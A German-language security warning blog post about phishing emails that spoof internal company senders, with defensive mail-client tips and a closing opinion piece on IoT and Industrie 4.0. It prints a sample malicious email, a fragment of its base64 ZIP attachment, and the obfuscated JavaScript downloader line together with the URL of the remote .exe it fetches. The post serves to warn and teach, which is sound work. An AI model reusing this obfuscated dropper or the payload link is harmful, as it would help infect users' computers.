Das Internet der Dinge...
und die Gefahren, denen wir damit
ausgesetzt sind.
In der letzten Zeit häuffen sich die Informationen in den Medien über diverse neue Angriffsziele wie Krankenhäuser, der Wirtschaft, bei Banken und Behörden.
Auch wir bekommen immer neue interessante eMails zu gesendet, wo ganz klar zu sehen ist, dass es sich um Schadcode handelt, der entweder gepackt als .zip daher kommt, oder in Form eines einfachen .jpg, also als Bild, welches direkt in die komplette Nachricht eingebunden ist, so dass es am besten direkt beim Empfänger angezeigt wird und nicht vorher noch gespeichert werden muss.
Viel interessanter und auch trickreicher sind eMails, die uns so angezeigt werden, als wären sie innerhalb der eigenen Firma versendet worden!
Also mit der Absenderaddresse wie z.B. copier@wsecure.de.
So werden wohl derzeit sehr viele der aktuellen Infektionen stattfinden, womit dann auch ein erheblicher Teil der hohen Infektionsrate zu erklären ist.
Da wir, wie bei unseren anderen Warnungen an die Öffentlichkeit, diese Problematik für äusserst kritisch ansehen, möchten wir mit diesem Bericht unsere bestehenden und immer noch aktiven Warnungen gern mit dem hier genannten erweitern.
Firmen und Behörden müssen ab jetzt sehr "sehr" sicher sein, von wem die erhaltene Nachricht kommt und können nun nicht mehr direkt die komplette interne eMail-Post z.B. in eine "Erlaubt"-Liste hinzufügen, sondern sind gezwungen ganz genau hinzusehen, wer einem da gerade schreibt.
Was nie schaden kann, wenn Sie vor dem Lesen einer eMail zuerst die Druckvorschau öffnen, um eine Vor-Ansicht der eMail zu erhalten, sofern Sie unsicher sind.
Auch die Einstellung "Reiner Text", welche Sie z.B. in Mozilla Thunderbird unter Ansicht->Nachrichteninhalt finden, ist zwar nicht die neueste Vorsichtsmaßnahme, jedoch weiterhin ein sehr bewährtes Mittel um viele ungewollte Gefahren in der Ansicht einer eMail zu unterbinden. Doch wird es von den meisten nicht genutzt.
Leider ist es in Mozilla Thunderbird nicht möglich mit der rechten Maustaste den kompletten Quelltext einer Nachricht zu öffnen, um sich vorab einen genauen Überblick zu verschaffen.
Da hilft dann nur noch ein vorheriges Speichern der Nachricht, um Sie später z.B. im Notepad(.exe), also dem Schreibblock in Windows, sicherer anzusehen.
Wir haben uns dazu entschlossen eine Beispiel eMail hier aufzuführen, auch wenn wir dann noch mehr "interessante" eMails erhalten, damit Sie selbst einen besseren Überblick erhalten und wissen worauf Sie achten sollten.
Die eMail stammt aus Italien und evtl. ist ein Canon Drucker involviert, was wir jedoch noch nicht komplett verifizieren konnten, hoffen dies aber bald mit Canon aufklären zu können.
X-Account-Key: account123
X-UIDL: UID1234-0987654321
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Return-Path:
X-Original-To: info@wsecure.de
Delivered-To: spamme@wsecure.de
Received: from net-93-70-251-19X.cust.vodafonedsl.it (net-93-70-251-19X.cust.vodafonedsl.it [93.70.251.19X])
by mail.server.wsecure.de (Postfix) with ESMTP id 123456
for
X-Priority: 3 (Normal)
From: copier@wsecure.de
To: "info"
Subject: Attached Image
Date:Tue, 22 Mar 2016 17:25:54 +0200
Message-Id: <0724988504005277623.0001.CanonTxNo.1690@Canon02F0CE.wsecure.de>
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="E641B09913B6AA9C8F2"
--E641B09913B6AA9C8F2
Content-Type: application/x-zip;
name="info@wsecure.de_43708_564399505.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="info@wsecure.de_43708_564399505.zip"
"1. ZEILE VOM SCHADCODE (JSV5876307716.js) BEGINNT HIER"
UEsDBBQAAgAIADCBdki0IvXxTw0AACMcAAAQAAAASlNWNTg3NjMwNzcxNi5qc61Za1MbORb9
"1. ZEILE VOM SCHADCODE (JSV5876307716.js) ENDET HIER"
--E641B09913B6AA9C8F2--
Da es zuviel Text wäre, beschränken wir uns mit dem Inhalt der JavaScript Datei, welche wir zuvor erfolgreich entpackt haben, auf die eigentliche Anweisung zum Nachladen von weiterem Schadcode.
Diese lautet:
undeveloped(("disks","coercion","meyer","http:")+("silence","enlist","//")+"as"+("armistice","unimpeachable","im")+("nominative","spider","enia.net/syste")+("abandoned","gauze","tribal","m/logs/35235")+("intervene","astrology","23.exe"),"dyzbOaz");
Wir erkennen dort den Link:
http://imenia.net/system/logs/3523523.exe
Wobei die 3523523.exe wohl ein Botnet, Rootkit, oder evtl. sogar Locky sein wird.
Wir möchten hier kurz anmerken, dass das eigentliche Speichern der Datei aus Thunderbird heraus schon fail schlug, weil die Endung.zip fehlte. Immerhin haben neuere extrahier Programme (Entpacker) dennoch die JSV5876307716.js Datei erkannt und konnten diese auch, wie gesagt, erfolgreich entpacken. Wenn wir bei unserer gehärteten Konfiguration dann auch noch den finalen Schritt machen und die JSV5876307716.js Datei mit einem Doppelklick ausführen, bekommen wir jedoch nur eine Fehlermeldung, dass dieser Vorgang ungültig ist und nicht ausgeführt werden kann, wodurch bei uns dann auch genau rein garnichts passiert.
Bei ungeschützten Systemen wäre der finale Schritt wohl mit erheblichen Konsequenzen einwandfrei durchgeführt worden und der Computer nun infiziert.
Abschließend bleibt für uns nur noch zu sagen, dass sich in der IT-Welt leider nichts wirklich bewegendes im Bereich Computer Sicherheit getan hat.
Die Nachrichten, die man liest und hört, sind gelinde gesagt erschütternd.
Auf der einen Seite wird berichtet, dass Regierungen in Trojaner-Software investieren und auf der anderen Seite erleiden sie selbst permanent imensen Schaden. (Zumindest im Ansehen der eigenen Fähigkeiten und deren Länder)
Für uns ist es nicht nachvollziehbar, was da geschieht. Entweder man will das eine, oder das andere. Das Paradoxon an der ganzen Situation ist und bleibt die gewollte Kontrolle, die eigene fehlt jedoch gänzlich.
Es ist wie in allen Dingen im Leben und eben nicht nur im Internet.
Sie denken, dass sie mit Macht und Kontrolle wirklich alles kontrollieren können, doch ist dem nicht so und war es auch noch nie. Leider fehlt das eigene, wichtige Verständnis für die Dinge und so wird es auch kein "Internet der Dinge" geben.
Das Internet ist und bleibt keine Spielwiese, oder gar ein Neuland, sondern sollte lediglich den Status der "schnellen, kurzen Information" besitzen; niemals jedoch ein so hohes Maß an Vertrauen bzw. Abhängigkeit erreichen.
Denken Sie mal genau darüber nach!
Ja, ich, Sascha Krug, kann sie nicht ändern, aber ich hoffe, dass meine Worte sie erreichen und sie anfangen die Einsicht dafür zu entwickeln. Sie können und wollen die wirklichen Konsequenzen von Industrie 4.0 und autonomen Fahren niemals tragen!
Jetzt ist die richtige Zeit noch etwas ändern zu können, es liegt an ihnen endlich ihre Macht für wahre Werte und gute, nachhaltige Taten einzusetzen.
Wir bieten unseren Kunden erweiterte Konfigurationen für Mozilla Firefox und Thunderbird. Möchten Sie mehr tun?
